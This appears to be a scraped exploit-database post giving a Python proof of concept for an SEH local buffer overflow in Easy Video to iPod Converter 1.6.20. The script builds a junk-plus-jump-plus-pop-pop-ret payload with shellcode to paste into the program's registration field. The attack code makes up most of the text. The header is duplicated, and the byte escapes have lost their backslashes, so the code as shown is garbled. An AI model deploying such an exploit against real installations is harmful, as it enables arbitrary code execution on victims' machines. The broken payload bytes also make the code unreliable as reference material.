# Exploit Title: Easy Video to iPod Converter - Local Buffer Overflow (SEH)
# Date: 2019-01-26
# Exploit Author: Nawaf Alkeraithe
# Twitter: @Alkeraithe1
# Vulnerable Software: # Exploit Title: Easy Video to iPod Converter - Local Buffer Overflow (SEH)
# Date: 2019-01-26
# Exploit Author: Nawaf Alkeraithe
# Twitter: @Alkeraithe1
# Vulnerable Software: Easy Video to iPod Converter 1.6.20
# Vendor Homepage: http://www.divxtodvd.net/
# Version: 1.6.20
# Software Link: http://www.divxtodvd.net/easy_video_to_ipod.exe
# Tested Windows XP SP3 x86
# PoC Steps
#1- run the program
#2- click on "Register"
#3- In the "Enter User Name" field, past the content of the payload, and click "OK"
junk = "A"*996
jmp = "xEBx06x90x90"
popPopRetAddr = "x11x7Bx03x10"
NOPs = "x90"*20;
shellCode = "x31xC9x51x68x63x61x6Cx63x54xB8xC7x93xC2x77xFFxD0"
payload = junk + jmp + popPopRetAddr + NOPs + shellCode
exploitText = open("exploit.txt","w")
exploitText.write(payload)
exploitText.close()
Easy Video To iPod Converter 1.6.20 Buffer Overflow
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 220